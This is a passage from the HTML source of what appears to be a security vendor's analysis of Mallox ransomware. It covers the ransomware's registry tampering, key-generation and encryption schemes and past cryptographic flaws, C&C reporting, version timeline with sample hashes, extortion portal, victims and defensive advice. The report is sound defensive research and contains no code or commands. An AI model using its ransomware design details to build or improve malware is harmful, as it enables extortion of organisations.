  828. <div id="attachment_113618" style="width: 579px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113618" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12.png" alt="Threat message about file damage" width="569" height="486" class="size-full wp-image-113618" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12.png 569w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12-300x256.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12-410x350.png 410w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125152/Mallox-ransomware-12-328x280.png 328w" sizes="(max-width: 569px) 100vw, 569px" /></a><p id="caption-attachment-113618" class="wp-caption-text">Threat message about file damage</p></div>
  829. <p>Before starting encryption, the Trojan modifies the registry keys of the HKEY_LOCAL_MACHINE hive to disable UAC and hide the Shut Down, Restart and Sign Out buttons.</p>
  830. <h4 id="cryptography">Cryptography</h4>
  831. <p>The key generation scheme in the recent version shows significant changes. Presumably, the algorithm was altered by the Mallox developers in an attempt to fix vulnerabilities that allowed decrypting victims&#8217; files without the attackers&#8217; private key in earlier versions of the malware.</p>
  832. <p>In this latest version, three values embedded in the code are used to generate a shared secret: two public ECC master keys (<strong>master_public_key_1</strong>, <strong>master_public_key_2</strong>) generated on the attacker&#8217;s side and a hardcoded 12-byte array. The resulting new scheme is presented below:</p>
  833. <ul>
  834. <li>When the Trojan starts, it generates 56 random bytes via CTR_DRBG.</li>
  835. <li>Twelve bytes in the middle of this 56-byte array are replaced with the hardcoded bytes.</li>
  836. <li>The resulting 56 bytes are hashed with SHA-256.</li>
  837. <li>Using ECDH (curve25519) with the result of hashing and <strong>master_public_key_1</strong>, the Trojan generates a <strong>user_private_key</strong>.</li>
  838. <li>Using ECDH (curve25519) with the <strong>user_secret_key</strong> and the elliptic curve base point, the Trojan generates a <strong>user_public_key</strong>.</li>
  839. <li>Finally, again, using ECDH (curve25519) with <strong>user_secret_key</strong> and <strong>master_public_key_2</strong>, the Trojan generates a <strong>share_key</strong> shared secret.</li>
  840. <li>Later, this <strong>share_key </strong>is hashed with SHA-256.</li>
  841. </ul>
  842. <p>Below is a simplified diagram of this.</p>
  843. <div id="attachment_113645" style="width: 831px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113645" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13.png" alt="Key generation scheme in the most recent Mallox version" width="821" height="629" class="size-full wp-image-113645" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13.png 821w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-300x230.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-768x588.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-457x350.png 457w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-740x567.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-365x280.png 365w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125930/Mallox-ransomware-13-800x613.png 800w" sizes="(max-width: 821px) 100vw, 821px" /></a><p id="caption-attachment-113645" class="wp-caption-text">Key generation scheme in the most recent Mallox version</p></div>
  844. <p>The file encryption algorithm has also changed: now files are encrypted using AES-256 in GCM mode. File keys are generated with ISAAC PRNG, seeded by the output of the BCryptGenRandom API function combined with Mersenne Twister PRNG. The file keys, as before, are encrypted using AES-128 in CTR mode, and the key for that is still the first half of the SHA-256 hashed <strong>share_key</strong>.</p>
  845. <p>The technical buffer added at the end of each encrypted file has been expanded. Its beginning and end are indicated by the markers 0x02010201 and 0x04030403, shown in green in the image below. In this version, the ransomware encrypts the first 60% of the file — the total number of encrypted file chunks is shown in pink. Compared to the original version, the chunks have a size of 0x800000 bytes, are located next to each other and are encrypted entirely without further division. Purple stands for the size of the original file, red for the encrypted file key and IV for AES-256-GCM. The blue part is IV for AES-128-CTR, which is used to encrypt file keys. The orange part is the <strong>user_public_key</strong>.</p>
  846. <div id="attachment_113644" style="width: 1216px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113644" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14.png" alt="Technical buffer structure saved at the end of the file in the latest Mallox version" width="1206" height="264" class="size-full wp-image-113644" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14.png 1206w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-300x66.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-1024x224.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-768x168.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-1200x264.png 1200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-740x162.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125917/Mallox-ransomware-14-800x175.png 800w" sizes="(max-width: 1206px) 100vw, 1206px" /></a><p id="caption-attachment-113644" class="wp-caption-text">&#8220;Technical buffer&#8221; structure saved at the end of the file in the latest Mallox version</p></div>
  847. <h4 id="communication-with-the-attackers-cc-server">Communication with the attackers&#8217; C&amp;C server</h4>
  848. <p>First, the ransomware gets the external IP address of the encrypted device via a third-party public service. Then it collects information about the user, device, network, disks and files and sends it to the attacker&#8217;s C&amp;C server with an HTTP POST request.</p>
  849. <div id="attachment_113643" style="width: 1498px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113643" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15.png" alt="Data sent to the attacker&#039;s C&amp;C" width="1488" height="649" class="size-full wp-image-113643" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15.png 1488w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-300x131.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-1024x447.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-768x335.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-802x350.png 802w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-740x323.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-642x280.png 642w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125904/Mallox-ransomware-15-800x349.png 800w" sizes="(max-width: 1488px) 100vw, 1488px" /></a><p id="caption-attachment-113643" class="wp-caption-text">Data sent to the attacker&#8217;s C&amp;C</p></div>
  850. <p>If all data is received and processed successfully, the server responds with &#8220;Successfully_added&#8221;.</p>
  851. <div id="attachment_113642" style="width: 967px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113642" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16.png" alt="Server response" width="957" height="615" class="size-full wp-image-113642" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16.png 957w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-300x193.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-768x494.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-545x350.png 545w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-740x476.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-436x280.png 436w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125850/Mallox-ransomware-16-800x514.png 800w" sizes="(max-width: 957px) 100vw, 957px" /></a><p id="caption-attachment-113642" class="wp-caption-text">Server response</p></div>
  852. <h3 id="timeline-of-mallox-versions">Timeline of Mallox versions</h3>
  853. <p>We have been tracking a large number of samples since the very first version of Mallox appeared in 2021. During this time, more than 700 different samples have been found, which we have divided into 12 versions for convenience. This division is based on changes in ransomware functionality or cryptography. Please note that the Trojan samples do not contain any version numbers internally. In the tables below, we provide a brief description of changes introduced in each Mallox version along with the MD5 of one of the samples belonging to this version.</p>
  854. <table width="738">
  855. <tbody>
  856. <tr>
  857. <td width="252"><strong>Sample hash (MD5)</strong></td>
  858. <td width="54"><strong>Version</strong></td>
  859. <td width="84"><strong>PE timestamp</strong></td>
  860. <td width="348"><strong>Comment</strong></td>
  861. </tr>
  862. <tr>
  863. <td width="252">9b772efb921de8f172f21125dd0e0ff7</td>
  864. <td width="54">1</td>
  865. <td width="84">15 May 2021</td>
  866. <td width="348">Earliest found version</td>
  867. </tr>
  868. <tr>
  869. <td width="252">79b60f8b5052a9d4cc0c92c2cdc47485</td>
  870. <td width="54">2</td>
  871. <td width="84">20 Nov 2021</td>
  872. <td width="348">The notes became generic, presumably as an initial step in a transition to RaaS distribution.</td>
  873. </tr>
  874. <tr>
  875. <td width="252">e713f05a62914496eef512a93a611622</td>
  876. <td width="54">3</td>
  877. <td width="84">17 Feb 2022</td>
  878. <td width="348">Fixed a vulnerability in the encryption scheme that allowed files to be decrypted without the attackers&#8217; private keys.</td>
  879. </tr>
  880. <tr>
  881. <td width="252">3829a09bca120206883539eb33d55311</td>
  882. <td width="54">4</td>
  883. <td width="84">9 May 2022</td>
  884. <td width="348">Disabled self-spreading. The vulnerability is still fixed.</td>
  885. </tr>
  886. <tr>
  887. <td width="252">a8e214683307adaff39783dc656b398a</td>
  888. <td width="54">5 (gen)</td>
  889. <td width="84">10 Jun 2022</td>
  890. <td width="348">Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme using data from the device — we refer to this scheme as &#8220;generated key&#8221;. Added a new &#8220;-path&#8221; argument. Enabled self-spreading again.</td>
  891. </tr>
  892. <tr>
  893. <td width="252">ac1a255e5c908f12ef68a45fc0043b16</td>
  894. <td width="54">6 (emb)</td>
  895. <td width="84">17 Jul 2022</td>
  896. <td width="348">Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme, using an embedded key — we refer to this scheme as &#8220;embedded key&#8221;.</td>
  897. </tr>
  898. </tbody>
  899. </table>
  900. <p>Starting with versions 5 and 6, all the subsequent versions through 11 were divided into two key generation schemes: &#8220;generated key&#8221; (gen) and &#8220;embedded key&#8221; (emb). These versions were used in parallel, and if some changes were made to one of these variants, then the other variant with the same changes would soon appear, sometimes on the same day. Later in this report, we will describe both methods in detail.</p>
  901. <table width="738">
  902. <tbody>
  903. <tr>
  904. <td width="252"><strong>Hash (MD5)</strong></td>
  905. <td width="60"><strong>Version</strong></td>
  906. <td width="84"><strong>PE timestamp</strong></td>
  907. <td width="342"><strong>Comment</strong></td>
  908. </tr>
  909. <tr>
  910. <td width="252">b1b42fa300d8f43c6deb98754caf0934</td>
  911. <td width="60">7 (gen)</td>
  912. <td width="84">25 Oct 2022</td>
  913. <td width="342">Added registry modification functions and an OS shutdown message.</p>
  914. <p>Completed the transition to a RaaS distribution scheme with support for affiliate IDs hardcoded in the Trojan&#8217;s body and reported to C&amp;C via the HTTP parameter &#8220;user=&#8221;.</td>
  915. </tr>
  916. <tr>
  917. <td width="252">3762f98a55f0ec19702f388fc0db74e2</td>
  918. <td width="60">8 (emb)</td>
  919. <td width="84">31 Oct 2022</td>
  920. <td width="342">Similar to the previous one, but with a different key generation scheme.</td>
  921. </tr>
  922. <tr>
  923. <td width="252">6bd93817967cdb61e0d7951382390fa0</td>
  924. <td width="60">9 (gen)</td>
  925. <td width="84">18 Apr 2023</td>
  926. <td width="342">Added a new argument: &#8220;-queue&#8221;.</td>
  927. </tr>
  928. <tr>
  929. <td width="252">c494342b6c84f649dece4df2d3ff1031</td>
  930. <td width="60">10 (emb)</td>
  931. <td width="84">18 Apr 2023</td>
  932. <td width="342">Similar to the previous one, but with a different key generation scheme.</td>
  933. </tr>
  934. <tr>
  935. <td width="252">16e708876c32ff56593ba00931e0fb67</td>
  936. <td width="60">11 (emb)</td>
  937. <td width="84">25 Sep 2023</td>
  938. <td width="342">Switched to an x64 version: later versions are also x64, while all earlier versions were x86. Added new features: power scheme, disabling UAC, hiding Shutdown/Reboot/Sign out buttons, etc. Switched to a new format for arguments: requires valid file paths as arguments. Also, instead of ChaCha, file content is now encrypted with AES-256-GCM.</td>
  939. </tr>
  940. <tr>
  941. <td width="252">d32a3478aad766be96f0cdbda1f10091</td>
  942. <td width="60">11 (gen)</td>
  943. <td width="84">26 Sep 2023</td>
  944. <td width="342">Similar to the previous one, but with a different key generation scheme.</td>
  945. </tr>
  946. <tr>
  947. <td width="252">e98b3a8d2179e0bd0bebba42735d11b7</td>
  948. <td width="60">12</td>
  949. <td width="84">6 Mar 2024</td>
  950. <td width="342">Fixed a vulnerability in the key generation schemes by adopting a new, cryptographically secure scheme. Added the cryptographic random number generator CTR_DRBG (AES based).</td>
  951. </tr>
  952. </tbody>
  953. </table>
  954. <p>There is one version that stands out from this classification. We dubbed it 1F. The only two samples belonging to this version were discovered in June 2023 and February 2024. Despite the discovery dates, they are almost exactly the same as the first version, but with a fixed vulnerability in the cryptographic scheme. What is curious, this fix differs from the convoluted encryption schemes seen in versions 3, 4 and 12. Instead, it is a small local fix using the cryptographically secure SystemFunction036 (RtlGenRandom) function for seed generation.</p>
  955. <p><strong> </strong></p>
  956. <table width="714">
  957. <tbody>
  958. <tr>
  959. <td width="252"><strong>Hash (MD5)</strong></td>
  960. <td width="66"><strong>Version</strong></td>
  961. <td width="90"><strong>PE timestamp</strong></td>
  962. <td width="306"><strong>Comment</strong></td>
  963. </tr>
  964. <tr>
  965. <td width="252">98c7f6b6ddf6a01adb25457e9a3c52b8</td>
  966. <td width="66">1F</td>
  967. <td width="90">5 Jun 2023</td>
  968. <td width="306">Fixed a vulnerability in the version 1 key generation scheme using RtlGenRandom.</td>
  969. </tr>
  970. <tr>
  971. <td width="252">b13a1e9c7ef5a51f64a58bae9b508e62</td>
  972. <td width="66">1F</td>
  973. <td width="90">23 Feb 2024</td>
  974. <td width="306">Exactly the same as the previous one.</td>
  975. </tr>
  976. </tbody>
  977. </table>
  978. <h4 id="cryptographic-scheme-in-v5-and-above-the-generated-key-variant">Cryptographic scheme in v5 and above: the &#8220;generated key&#8221; variant</h4>
  979. <p>This scheme uses data from the device to populate an array with a maximum size of 56 bytes, from which a user ECC private key is obtained. The array is generated based on the functions GetVolumeInformationW, GetFileTime, GetComputerNameA, and the CPUID instruction.</p>
  980. <table width="691">
  981. <tbody>
  982. <tr>
  983. <td width="146"><strong>Bytes count</strong></td>
  984. <td width="326"><strong>Entropy source</strong></td>
  985. <td width="219"><strong>Comment</strong></td>
  986. </tr>
  987. <tr>
  988. <td width="146">4</td>
  989. <td width="326">GetVolumeInformationW</td>
  990. <td width="219">&nbsp;</td>
  991. </tr>
  992. <tr>
  993. <td width="146">16</td>
  994. <td width="326">__cpuid</td>
  995. <td width="219">&nbsp;</td>
  996. </tr>
  997. <tr>
  998. <td width="146">12</td>
  999. <td width="326">Embedded in code</td>
  1000. <td width="219">Varies between samples</td>
  1001. </tr>
  1002. <tr>
  1003. <td width="146">8</td>
  1004. <td width="326">GetFileTime</td>
  1005. <td width="219">&nbsp;</td>
  1006. </tr>
  1007. <tr>
  1008. <td width="146">&lt;= 16</td>
  1009. <td width="326">GetComputerNameA</td>
  1010. <td width="219">Can be less than 16 bytes</td>
  1011. </tr>
  1012. </tbody>
  1013. </table>
  1014. <p>The rest of the scheme contains three curve25519 calls, similar to the recent version (12), but unlike that, the scheme described in this paragraph is not cryptographically secure.</p>
  1015. <div id="attachment_113641" style="width: 649px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113641" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17.png" alt="Shared key generation, generated key" width="639" height="486" class="size-full wp-image-113641" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17.png 639w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17-300x228.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17-460x350.png 460w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17-368x280.png 368w" sizes="(max-width: 639px) 100vw, 639px" /></a><p id="caption-attachment-113641" class="wp-caption-text">Shared key generation, &#8220;generated key&#8221;, v5+</p></div>
  1016. <h4 id="cryptographic-scheme-in-v6-and-above-the-embedded-key-variant">Cryptographic scheme in v6 and above: the &#8220;embedded key&#8221; variant</h4>
  1017. <p>In this case, no random value generation is used to calculate the shared secret share_key. The user_private_key is hardcoded in the Trojan&#8217;s body, and the rest of the scheme has not changed compared to the first version. This is also a cryptographically non-secure scheme.</p>
  1018. <div id="attachment_113640" style="width: 782px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113640" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18.png" alt="Shared key generation, embedded key" width="772" height="392" class="size-full wp-image-113640" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18.png 772w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-300x152.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-768x390.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-689x350.png 689w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-740x376.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-551x280.png 551w" sizes="(max-width: 772px) 100vw, 772px" /></a><p id="caption-attachment-113640" class="wp-caption-text">Shared key generation, &#8220;embedded key&#8221;, v5+</p></div>
  1019. <h2 id="negotiation-portal-and-dls-data-leak-site">Negotiation portal and DLS (data leak site)</h2>
  1020. <p>When encrypting a victim&#8217;s files Mallox creates a ransom note commonly named &#8220;HOW TO BACK FILES.txt&#8221;, &#8220;HOW TO RESTORE FILES.txt&#8221;, &#8220;RECOVERY INFORMATION.txt&#8221;, &#8220;FILE RECOVERY.txt&#8221; or some such. In the note, the threat actors instruct the victim about the ways to communicate with the attackers to negotiate the ransom payment: by visiting a specified TOR site (negotiation portal) and logging in with the victim ID, or by sending an email message to a specified address.</p>
  1021. <p>Upon authenticating with the negotiation portal, the victim is presented with a page containing information about their infection case:</p>
  1022. <ul>
  1023. <li>Status: whether the exfiltrated data has been published</li>
  1024. <li>Ransom price in USD and BTC</li>
  1025. <li>Payment addresses for BTC and TETHER TRC-20</li>
  1026. <li>Answers to frequently asked questions</li>
  1027. <li>Chat widget to talk to the ransomware operator</li>
  1028. </ul>
  1029. <div id="attachment_113637" style="width: 1569px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113637" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19.png" alt="Negotiation portal (victim page)" width="1559" height="982" class="size-full wp-image-113637" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19.png 1559w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-300x189.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-1024x645.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-768x484.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-1536x968.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-556x350.png 556w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-740x466.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-445x280.png 445w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-800x504.png 800w" sizes="(max-width: 1559px) 100vw, 1559px" /></a><p id="caption-attachment-113637" class="wp-caption-text">Negotiation portal (victim page)</p></div>
  1030. <p>The main page of the Mallox data leak site, which resides on the same domain as the negotiation portal, contains the list of victim companies. Countdown timers indicate the remaining time until the stolen data from each company is published in case the victim fails to pay up.</p>
  1031. <div id="attachment_113636" style="width: 1505px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113636" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20.png" alt="Mallox data leak site: the home page" width="1495" height="1616" class="size-full wp-image-113636" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20.png 1495w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-278x300.png 278w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-947x1024.png 947w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-768x830.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-1421x1536.png 1421w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-324x350.png 324w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-740x800.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-259x280.png 259w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-800x865.png 800w" sizes="(max-width: 1495px) 100vw, 1495px" /></a><p id="caption-attachment-113636" class="wp-caption-text">Mallox data leak site: the home page</p></div>
  1032. <p>The information about the companies that apparently refused to cooperate is provided on a new page when the user clicks &#8220;View&#8221;. This page lists some details, such as the victim&#8217;s approximate revenue, the total volume of stolen data, links to download archives allegedly containing some or all of the exfiltrated files, and the password to unpack the archives.</p>
  1033. <div id="attachment_113635" style="width: 1505px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113635" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21.png" alt="Page with victim company details" width="1495" height="1609" class="size-full wp-image-113635" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21.png 1495w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-279x300.png 279w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-951x1024.png 951w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-768x827.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-1427x1536.png 1427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-325x350.png 325w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-740x796.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-260x280.png 260w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-800x861.png 800w" sizes="(max-width: 1495px) 100vw, 1495px" /></a><p id="caption-attachment-113635" class="wp-caption-text">Page with victim company details</p></div>
  1034. <p>For additional publicity and promotion of their affiliate program, the Mallox threat actors maintain an X account that posts regular updates about the group&#8217;s new victims and shares links to download new portions of stolen data.</p>
  1035. <div id="attachment_113639" style="width: 1067px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113639" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22.png" alt="Mallox profile on X" width="1057" height="1322" class="size-full wp-image-113639" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22.png 1057w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-240x300.png 240w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-819x1024.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-768x961.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-280x350.png 280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-740x926.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-224x280.png 224w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-720x900.png 720w" sizes="(max-width: 1057px) 100vw, 1057px" /></a><p id="caption-attachment-113639" class="wp-caption-text">Mallox profile on X</p></div>
  1036. <h2 id="victims">Victims</h2>
  1037. <p>The geographical distribution of unique KSN users who encountered the Mallox ransomware shows that the affiliates of the RaaS do not restrict their activities to a specific country and apparently aim to attack vulnerable companies anywhere these are located. That being said, some regions tend to be a more desirable target for Mallox extortionists. The countries that have attracted the most infection attempts are Brazil, Vietnam and China.</p>
  1038. <div class="js-infogram-embed" data-id="_/Ww7OiYhrRlz3yFdQcB4e" data-type="interactive" data-title="03 EN Mallox data" style="min-height:;"></div>
  1039. <p align="center"><strong>Geographical chart of Mallox attack attempts (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125551/03-en-mallox-data.png" target="_blank" rel="noopener">download</a>)</strong></p>
  1040. <h2 id="conclusions">Conclusions</h2>
  1041. <p>Our report provides a comprehensive overview of the Mallox ransomware, its characteristics, the history of its evolution, and the potential impact it can have on victims. By understanding the nature of Mallox ransomware and implementing appropriate security measures, companies and organizations can better safeguard their digital assets and minimize the risk of falling victim to this malicious software.</p>
  1042. <p>Our recommendations for maximizing your organization&#8217;s security:</p>
  1043. <ul>
  1044. <li>Do not expose remote desktop services, such as RDP, to public networks unless absolutely necessary, and always use strong passwords.</li>
  1045. <li>Make sure commercial VPN solutions and other server-side software are always up to date as exploitation of this type of software is a common ransomware infection vector. Always keep client-side applications up to date.</li>
